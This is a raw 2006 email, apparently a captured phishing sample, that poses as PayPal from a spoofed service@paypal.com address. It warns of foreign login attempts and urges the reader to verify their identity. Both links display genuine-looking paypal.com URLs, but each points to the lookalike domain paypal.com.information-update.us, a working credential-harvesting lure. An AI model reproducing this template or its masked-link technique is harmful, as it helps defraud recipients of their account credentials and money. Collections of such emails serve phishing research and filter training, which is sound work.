From: "PayPal"<service@paypal.com>
Subject: Update Your PayPal Account
Date: Tue, 6 Jun 2006 09:57:26 +0300
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <WWW-54F20S8UF1GNiZI000004e2@www-54f20s8uf1g>
X-OriginalArrivalTime: 06 Jun 2006 06:51:07.0171 (UTC) FILETIME=[9621D730:01C68935]
To: undisclosed-recipients:;
Status: 
X-Status: 
X-Keywords:                   

<FONT face="Courier New" size=2>Dear PayPal,<BR><BR>We recently noticed one or more
attempts to log in to your PayPal account<BR>from a foreign IP address.<BR><BR>If you
recently accessed your account while traveling, the unusual log in<BR>attempts may have
been initiated by you. However, if you did not initiate<BR>the log ins, please visit
PayPal as soon as possible to verify your<BR>identity:<BR><BR><A class=m1
href="http://www.paypal.com.information-update.us/" target=_blank><FONT
face="Courier New" color=#0066cc size=2>https://www.paypal.com/us/cgi-bin/webscr?
cmd=_login-run</FONT></A><BR><BR><FONT face="Courier New" size=2>Verify your identity is
a security measure that will ensure that you are<BR>the only person with access to the
account.<BR><BR>Thanks for your patience as we work together to protect your
account.<BR><BR>Sincerely,<BR>PayPal<BR>------------------------------------------------
----------------
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
PROTECT YOUR PASSWORD<BR><BR>&nbsp;&nbsp; NEVER give your password to anyone and ONLY
log in at<BR></FONT><A class=m1 href="http://www.paypal.com.information-update.us/" target=_blank><FONT face="Courier New" color=#0066cc
size=2>https://www.paypal.com/</FONT></A><FONT face="Courier New" size=2>. Protect
yourself against fraudulent websites by<BR>opening a new web browser (e.g. Internet
Explorer or Netscape) and typing<BR>in the PayPal URL every time you log in to your
account.<BR>----------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>Please do not reply to this e-mail. Mail sent to this
address cannot be<BR>answered. For assistance, log in to your PayPal account and choose
the<BR>"Help" link in the header of any page.<BR></FONT><BR><FONT
face="Courier&#13;&#10;New" size=2>PayPal Email ID PP321</FONT></FONT>

From service@paypal.com  Tue Jun  6 03:31:15 2006
Return-Path: <service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by funky.example.com (Postfix) with ESMTP id 3A74046942;
	Tue,  6 Jun 2006 03:31:15 -0400 (EDT)
Received: from 192.168.111.2 (mn-69-68-121-136.sta.sprint-hsd.net [69.68.121.136])
	by mail2.example.com (Postfix) with SMTP id C35076FA46C;
	Tue,  6 Jun 2006 03:31:17 -0400 (EDT)
Received: from 45.168.224.8 by ; Tue, 06 Jun 2006 11:21:06 +0300
Message-ID: <KSRRPVQMCVFDZCGZMRMSIVKW@yahoo.com>
